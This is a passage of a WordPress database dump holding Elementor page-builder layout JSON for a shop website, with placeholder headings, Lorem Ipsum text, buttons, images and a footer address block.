":\"0ea21e0\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Saira Stencil One\",\"typography_font_size\":{\"unit\":\"px\",\"size\":22,\"sizes\":[]},\"typography_font_weight\":\"100\",\"text_stroke_text_stroke_type\":\"yes\",\"text_stroke_text_stroke\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"text_stroke_stroke_color\":\"#FFFFFF\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"color\":\"rgba(68.25, 44.95597826086957, 44.95597826086957, 0.3)\"},\"_margin\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"122\",\"bottom\":\"0\",\"left\":\"423\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e9c7fcf\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"04a298f\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"30d54b3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#0303037A\",\"margin\":{\"unit\":\"px\",\"top\":\"37\",\"right\":\"0\",\"bottom\":\"-25\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"27\",\"right\":\"1\",\"bottom\":\"42\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cce3d9f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"924390d\",\"elType\":\"widget\",\"settings\":{\"text_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"0e2e48f\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#FF8800\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"712d983\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":true}],\"isInner\":true},{\"id\":\"21726cb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"3\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98f9256\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":7.1929999999999996},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f16dea3\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"cc1fd22\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"f37b36f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fa36b21\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e8bbbae\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"aa95f02\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#FF6E00\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"374288e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"30868ff\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f78ed1a\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"39b0f4e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e9c825a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":125,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"62f5f76\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\"},\"elements\":[{\"id\":\"a2fa7af\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4e1ad\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"caa5378\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"39999ab\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lorem Ipsum<\\/strong>\\u00a0is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.<\\/p>\",\"align\":\"center\",\"text_color\":\"#174725\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"eaa49a3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Know More\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c3a23a2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"22d1461\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"750\",\"left\":\"100\",\"isLinked\":false}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"acb2826\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\",\"margin\":{\"unit\":\"px\",\"top\":\"-458\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"84a32d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"89a82b4\",\"elType\":\"widget\",\"settings\":{\"title\":\"LATEST NEWS\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36bc667\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":740,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"bb02c40\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"0769ef1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"75ce5f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f527d10\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"7899f3f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8274f01\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0f6b27e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70a66d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"ae8a1a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"fd8def6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"91ca2f8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a36dcd9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"125f124\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"508fa7c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4ddf161\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36cae65\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"152\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\\nContact : (+91)7259272171<br>\\nE-mail id: mango@homedirect.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(8247,1453,'_elementor_page_assets','a:0:{}'),(8249,1454,'_elementor_edit_mode','builder'),(8250,1454,'_elementor_template_type','wp-page'),(8251,1454,'_elementor_version','3.7.7'),(8252,1454,'_wp_page_template','elementor_canvas'),(8253,1454,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"50\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":58.631999999999998},\"elements\":[],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":5.2939999999999996},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":3.1619999999999999},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":12.894},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7fab8ef\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"stretch_section\":\"section-stretched\",\"structure\":\"22\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-55,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"224\",\"left\":\"0\",\"isLinked\":false},\"margin\":{\"unit\":\"px\",\"top\":\"-14\",\"right\":0,\"bottom\":\"-14\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"728be13\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":92.108999999999995},\"elements\":[{\"id\":\"0ea21e0\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Saira Stencil One\",\"typography_font_size\":{\"unit\":\"px\",\"size\":22,\"sizes\":[]},\"typography_font_weight\":\"100\",\"text_stroke_text_stroke_type\":\"yes\",\"text_stroke_text_stroke\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"text_stroke_stroke_color\":\"#FFFFFF\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"color\":\"rgba(68.25, 44.95597826086957, 44.95597826086957, 0.3)\"},\"_margin\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"122\",\"bottom\":\"0\",\"left\":\"423\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e9c7fcf\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"04a298f\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"30d54b3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#0303037A\",\"margin\":{\"unit\":\"px\",\"top\":\"37\",\"right\":\"0\",\"bottom\":\"-25\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"27\",\"right\":\"1\",\"bottom\":\"42\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cce3d9f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"924390d\",\"elType\":\"widget\",\"settings\":{\"text_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"0e2e48f\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#FF8800\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"712d983\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":true}],\"isInner\":true},{\"id\":\"21726cb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"3\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98f9256\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":7.1929999999999996},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#0000007D\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"979ed75\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4b78a11\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"970607c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f16dea3\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"cc1fd22\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"f37b36f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fa36b21\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e8bbbae\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"aa95f02\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#FF6E00\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"374288e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"30868ff\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f78ed1a\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"39b0f4e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e9c825a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":125,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"62f5f76\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\"},\"elements\":[{\"id\":\"a2fa7af\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4e1ad\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"caa5378\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"39999ab\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lorem Ipsum<\\/strong>\\u00a0is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.<\\/p>\",\"align\":\"center\",\"text_color\":\"#174725\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"eaa49a3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Know More\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c3a23a2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"22d1461\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"750\",\"left\":\"100\",\"isLinked\":false}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"acb2826\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\",\"margin\":{\"unit\":\"px\",\"top\":\"-458\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"84a32d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"89a82b4\",\"elType\":\"widget\",\"settings\":{\"title\":\"LATEST NEWS\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36bc667\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":740,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"bb02c40\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"0769ef1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"75ce5f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f527d10\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"7899f3f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8274f01\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0f6b27e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70a66d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"ae8a1a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"fd8def6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"91ca2f8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a36dcd9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click 